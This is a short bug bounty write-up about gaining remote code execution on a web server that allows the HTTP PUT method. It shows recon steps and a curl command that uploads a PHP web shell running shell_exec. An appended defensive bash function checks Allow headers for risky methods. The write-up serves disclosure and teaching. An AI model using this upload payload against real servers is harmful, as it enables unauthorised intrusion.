Ebrahim Mustafa
1 min read · Jun 17, 2021

RCE via server misconfiguration: PUT HTTP method enabled

Hey guys, today I want to talk about the first RCE I found, at a private program on “hackerone.com”, with my best friend “Ahmed elmalkey”.

First we did subdomain enumeration with many tools, like “subfinder with API keys”. Now that we had subdomains, we went to check for live subdomains. After that

we sent the live subdomains to Nuclei. After 5 min we got an alert: “http method enabled”. “Oh no, is this real or a false positive?” we said.

We went to check whether the alert was real or not:

curl -i -X OPTIONS https://target.tld

GET, PUT, HEAD enabled. Hey, this is real! Now we went to make a PoC:

curl -X PUT https://target.tld/POC.php \
  -H "Accept: */*" \
  -d '<?php
$output = shell_exec("ls -lart");
echo "<pre>$output</pre>";
?>'

Now we had RCE on the server. Done.

Thanks for reading the essay, and I’m sorry for any misspellings, because this is my first writeup.
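The OPTIONS check from the write-up can be turned into a repeatable audit of hosts you operate. The function below is an added example, not part of the original write-up; the name `risky_methods` and the sample response are constructed for illustration. An advertised method is only a flag for review: the fix is to disable PUT/WebDAV where it is not needed and to keep writable directories from executing scripts.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up).
# Reads a raw HTTP response (status line + headers) on stdin and prints each
# write-capable method advertised in an Allow header, one per line.
# Exit status: 0 if at least one was found, 1 otherwise.
#
# Usage against a host you own (hostname is a placeholder):
#   curl -s -i -X OPTIONS https://your-host.example/ | risky_methods
risky_methods() {
  tr -d '\r' |                          # HTTP header lines end in CRLF
  awk '
    BEGIN {
      n = split("PUT DELETE PATCH MKCOL COPY MOVE PROPPATCH", r, " ")
      for (i = 1; i <= n; i++) risky[r[i]] = 1
    }
    body  { next }                      # ignore everything after the headers
    /^$/  { body = 1; next }            # blank line ends the header block
    tolower($0) ~ /^allow[ \t]*:/ {     # header names are case-insensitive
      sub(/^[^:]*:/, "")                # keep only the header value
      m = split($0, parts, ",")
      for (i = 1; i <= m; i++) {
        meth = toupper(parts[i])
        gsub(/[ \t]/, "", meth)
        if ((meth in risky) && !(meth in seen)) {
          seen[meth] = 1
          print meth
          found = 1
        }
      }
    }
    END { exit(found ? 0 : 1) }
  '
}

# Constructed sample: the kind of response described in the write-up.
sample_response() {
  printf 'HTTP/1.1 200 OK\r\nServer: example\r\nallow: GET, PUT,HEAD\r\nContent-Length: 0\r\n\r\n'
}
```
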


Written by Ebrahim Mustafa

Cyber Security Pentester, Bug hunter, CTF player and Coder
